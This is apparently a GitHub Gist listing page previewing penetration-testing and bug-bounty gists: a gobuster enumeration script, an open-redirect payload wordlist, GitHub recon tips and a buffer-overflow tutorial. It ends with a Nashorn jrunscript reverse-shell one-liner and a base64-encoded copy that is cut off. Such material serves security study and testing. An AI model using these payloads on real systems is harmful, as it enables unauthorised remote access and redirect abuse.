A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
haircut
/ tcc-reset.py
Last active
April 5, 2024 11:27
Completely reset TCC services database in macOS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Completely reset TCC services database in macOS | |
| Note: Both the system and individual users have TCC databases; run the script as both | |
| a user and as root to completely reset TCC decisions at all levels. | |
| 2018-08-15: Resetting the 'Location' service fails; unknown cause | |
| 2018-08-16: Confirmed the 'All' service does not really reset _all_ | |
| services, so individual calls to each service is necessary. |
lokori
/ supergobuster.sh
Last active
July 1, 2022 20:29
gobuster enumerator for hack-the-box machines. This generates huge amount of useless requests..
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| set -eu | |
| URL=$1 | |
| echo "super go bustering for super brute: $URL" | |
| gobuster -u $URL -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/tomcat.txt | |
| gobuster -u $URL -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/nginx.txt | |
| gobuster -u $URL -l -s 200,204,301,302,307,403 -w /root/tools/SecLists/Discovery/Web_Content/apache.txt |
jhaddix
/ Testing_Checklist.md
Last active
July 9, 2024 19:44
— forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
EdOverflow
/ open_redirect_wordlist.txt
Last active
February 21, 2023 14:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /http://example.com | |
| /%5cexample.com | |
| /%2f%2fexample.com | |
| /example.com/%2f%2e%2e | |
| /http:/example.com | |
| /?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com | |
| /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com | |
| /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com | |
| /redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com | |
| /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com |
EdOverflow
/ github_bugbountyhunting.md
Last active
June 23, 2024 20:29
My tips for finding security issues in GitHub projects.
GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output
carnal0wnage
/ DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Last active
September 26, 2022 06:00
Links from Chris Gates/Ken Johnson DevOOPS RSA 17 presentation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links SessionID: HTA-W02 | |
| https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains | |
| Recording of talk from CERN | |
| https://indico.cern.ch/event/622483/ (click the recording button) | |
| Past talks: | |
| http://www.slideshare.net/KenJohnson61/aws-surival-guide |
unfo
/ how-to-oscp-final.md
Last active
February 26, 2024 08:39
ross-p
/ ethereum-account-scanner.js
Last active
February 10, 2024 19:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Ethereum Account Scanner | |
| * | |
| * To run this, you need your own geth node, accepting RPC | |
| * connections on a port you can access. | |
| * | |
| * Install pre-requisites: | |
| * sudo npm install -g web3 | |
| * | |
| * Usage: |
apolloclark
/ Buffer Overflow Tutorial in Kali.md
Last active
May 13, 2023 20:14
Buffer overflow demonstration in Kali Linux, based on the Computerphile video
This tutorial is based on the Computerphile video, made by Dr. Mike Pound
https://www.youtube.com/watch?v=1S0aBV-Waeo
The tutorial will show you how to trigger and exploit a buffer overflow attack against a custom C program, using Kali Linux 32-bit PAE 2016.1.
Torrent Link: https://images.offensive-security.com/virtual-images/Kali-Linux-2016.1-vbox-i686.torrent
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2VNewerOlder